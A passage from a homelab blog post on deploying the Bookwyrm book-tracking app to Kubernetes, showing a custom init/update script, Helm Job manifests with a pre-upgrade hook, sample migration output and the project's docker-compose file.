</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ref</span>: <span style="color:#e6db74">&#39;v0.7.5&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/woodpecker/bookwyrm</span>
</span></span></code></pre></div><p>Note that the <code>/mirrors/</code> part of the URL is not necessary to use it as a mirror,
I just put my Forgejo mirrors into a group called <code>mirrors</code>.</p>
<p>And with this, I was ending up with the Bookwyrm repo, checked out to the tag <code>v0.7.5</code>
in <code>/woodpecker/bookwyrm</code> in the rest of the pipeline steps.</p>
<p>Getting to the point of having the Bookwyrm image was quite a ride, but now it&rsquo;s
time for the actual Kubernetes deployment.</p>
<h3 id="kubernetes-deployment">Kubernetes deployment</h3>
<p>When it comes to dependencies, Bookwyrm requires a Postgres DB and Redis, plus
it supports an S3 bucket for media and other static assets. I will not go into
detail on those dependencies. If you&rsquo;re curious about how I&rsquo;m setting them
up in my Homelab, here are the two relevant posts:</p>
<ul>
<li><a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">CloudNativePG Postgres DB setup</a></li>
<li><a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">Ceph S3 setup</a></li>
</ul>
<p>When looking at Bookwyrm&rsquo;s <a href="https://docs.joinbookwyrm.com/install-prod.html">setup docs</a>,
it requires executing a script during initial deployment.</p>
<blockquote>
<p>Initialize the database by running ./bw-dev migrate</p></blockquote>
<p>And:</p>
<blockquote>
<p>Initialize the application with ./bw-dev setup, and copy the admin code to use when you create your admin account.</p></blockquote>
<p>So I needed to somehow integrate that into my setup. Looking at the <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/bw-dev">bw-dev script</a>,
it became pretty clear that Bookwyrm is really geared towards a docker-compose
deployment. The script is intended to be run outside of the Bookwyrm container,
as indicated by the fact that it calls docker-compose to achieve things:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> runweb <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    $DOCKER_COMPOSE run --rm web <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> initdb <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py initdb <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> migrate <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py migrate <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> admin_code <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py admin_code
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>This of course won&rsquo;t work in a Kubernetes deployment. To work around this, I
wrote my own script, using the <code>manage.py</code> commands directly, without calling
the <code>bw-dev</code> script. It ended up looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bookwyrm.sh</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #! /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    migrate() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py migrate &#34;$@&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    initdb() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py initdb &#34;$@&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    init() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Running init function...&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate &#34;django_celery_beat&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      initdb || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py compile_themes || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py collectstatic --no-input || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py admin_code || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      return 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    update() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Running update function...&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py compile_themes || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py collectstatic --no-input || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      return 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    op=&#34;${1}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    if [[ &#34;${op}&#34; == &#34;init&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      init || exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    elif [[ &#34;${op}&#34; == &#34;update&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      update || exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    else
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Unknown operation ${op}, aborting.&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    exit 0</span>
</span></span></code></pre></div><p>This script supports two functions, the first deployment initialization when
running <code>bookwyrm.sh init</code>, and the possible migration required during updates,
with <code>bookwyrm.sh update</code>.</p>
<p>Next question, how to run the script? For that, I looked into <a href="https://helm.sh/docs/topics/charts_hooks/">Helm chart hooks</a>.
These are annotations put into a template in a Helm chart which instantiates the
template only under certain circumstances. There are hooks available for all
phases of the Helm chart lifecycle, from install over delete to updates.</p>
<p>I sadly couldn&rsquo;t make use of the <code>post-install</code> hook for the <code>init</code> part of the
Bookwyrm script, because I had already installed the chart, as it also contains
the CloudNativePG and S3 bucket templates. and I already installed that part
of the chart. So for the init step, I opted for a simple workaround. The Job&rsquo;s
manifest looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>{{- <span style="color:#ae81ff">if .Values.runInit }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">batch/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Job</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-init</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-init</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">init-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/hl/bookwyrm.sh</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/hl</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>{{- <span style="color:#ae81ff">end }}</span>
</span></span></code></pre></div><p>So it only gets created when the value <code>runInit</code> is <code>true</code> in the <code>values.yaml</code>
file.</p>
<p>But for the update Job, which does DB migrations and regenerates static assets,
I was able to use the <code>pre-upgrade</code> hook. The manifest looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">batch/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Job</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;helm.sh/hook&#34;: </span><span style="color:#ae81ff">pre-upgrade</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-update</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/hl/bookwyrm.sh</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/hl</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span></code></pre></div><p>Note especially this part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;helm.sh/hook&#34;: </span><span style="color:#ae81ff">pre-upgrade</span>
</span></span></code></pre></div><p>That is what marks the Job as a hook to be run before anything else is updated.</p>
<p>The upgrade hook has one unfortunate semantic though - it will be launched
whenever the Helm chart is updated. Not just when the Bookwyrm version is incremented.
What that means is that any time there is any change to the chart, even if it is
just an added label for example, the Job will be executed. And it will be executed
during the <code>helm upgrade</code> run, and before anything else. So you run <code>helm upgrade</code>,
and Helm won&rsquo;t return immediately. It will wait for the hook to finish running,
and only then update all of the other manifests, where necessary. So these Helm
runs will take a bit longer.
But that still seems to be a relatively small prize compared to having the
instructions written in a documentation page I need to remember to execute when
Bookwyrm is updated.</p>
<p>Here is some of the output of my run of the Bookwyrm initialization:</p>
<pre tabindex="0"><code>Running init function...
Operations to perform:
  Apply all migrations: admin, auth, bookwyrm, contenttypes, django_celery_beat, oauth2_provider, sessions
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying contenttypes.0002_remove_content_type_name... OK
  Applying auth.0001_initial... OK
  Applying auth.0002_alter_permission_name_max_length... OK
  Applying auth.0003_alter_user_email_max_length... OK
  Applying auth.0004_alter_user_username_opts... OK
  [...]
Operations to perform:
  Apply all migrations: django_celery_beat
Running migrations:
  No migrations to apply.
  Your models in app(s): &#39;bookwyrm&#39; have changes that are not yet reflected in a migration, and so won&#39;t be applied.
  Run &#39;manage.py makemigrations&#39; to make new migrations, and then re-run &#39;manage.py migrate&#39; to apply them.
Compiled SASS/SCSS file: &#39;/app/bookwyrm/static/css/themes/bookwyrm-dark.scss&#39;
Compiled SASS/SCSS file: &#39;/app/bookwyrm/static/css/themes/bookwyrm-light.scss&#39;
257 static files copied.
*******************************************
Use this code to create your admin account:
1234-56-78-910-111213
*******************************************
</code></pre><p>Especially the last part is important, as that code is needed to create the
initial admin account.</p>
<p>With that done, I was finally ready to write the Deployment. For that, I took
the official <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/docker-compose.yml">docker-compose file</a>
as a blueprint:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nginx</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nginx:1.25.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#ae81ff">unless-stopped</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;1333:80&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">web</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./nginx:/etc/nginx/conf.d</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">db</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">postgres:13</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pgdata:/var/lib/postgresql/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">python manage.py runserver 0.0.0.0:8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;8000&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_activity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">redis:7.2.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">redis-server --requirepass ${REDIS_ACTIVITY_PASSWORD} --appendonly yes --port ${REDIS_ACTIVITY_PORT}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./redis.conf:/etc/redis/redis.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity_data:/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_broker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">redis:7.2.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">redis-server --requirepass ${REDIS_BROKER_PASSWORD} --appendonly yes --port ${REDIS_BROKER_PORT}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./redis.conf:/etc/redis/redis.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker_data:/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_worker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm worker -l info -Q high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_beat</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dev-tools</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">dev-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/app/dev-tools/</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">profiles</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">tools</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">volumes</span>:
